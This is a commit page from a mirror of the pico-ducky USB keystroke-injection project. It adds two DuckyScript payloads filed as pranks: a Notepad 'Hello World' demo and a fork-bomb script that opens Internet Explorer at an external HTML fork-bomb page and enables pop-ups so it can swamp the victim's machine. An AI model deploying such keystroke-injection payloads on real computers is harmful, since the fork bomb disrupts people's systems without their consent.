mirror of
https://github.com/dbisu/pico-ducky.git
synced 2025-12-10 22:14:59 +00:00
Quick payload deploy test
This commit is contained in:
14
Alex-Test/payloads/Windows/Prank/Forkbomb.txt
Normal file
14
Alex-Test/payloads/Windows/Prank/Forkbomb.txt
Normal file
@@ -0,0 +1,14 @@
|
||||
REM HTML Fork Bomb by Jonny Banana
|
||||
REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
|
||||
DELAY 2000
|
||||
CONTROL ESCAPE
|
||||
DELAY 200
|
||||
STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
|
||||
DELAY 200
|
||||
ENTER
|
||||
REM set a long delay to give time to this disgusting browser
|
||||
DELAY 1000
|
||||
REM it's time to enable Pop-Up
|
||||
TAB
|
||||
DELAY 200
|
||||
ENTER
|
||||
7
Alex-Test/payloads/Windows/Prank/Notepad.txt
Normal file
7
Alex-Test/payloads/Windows/Prank/Notepad.txt
Normal file
@@ -0,0 +1,7 @@
|
||||
REM The next four lines open Notepad in Windows and type "Hello World"
|
||||
WINDOWS R
|
||||
DELAY 250
|
||||
STRING notepad
|
||||
ENTER
|
||||
DELAY 250
|
||||
STRING Hello World
|
||||
Reference in New Issue
Block a user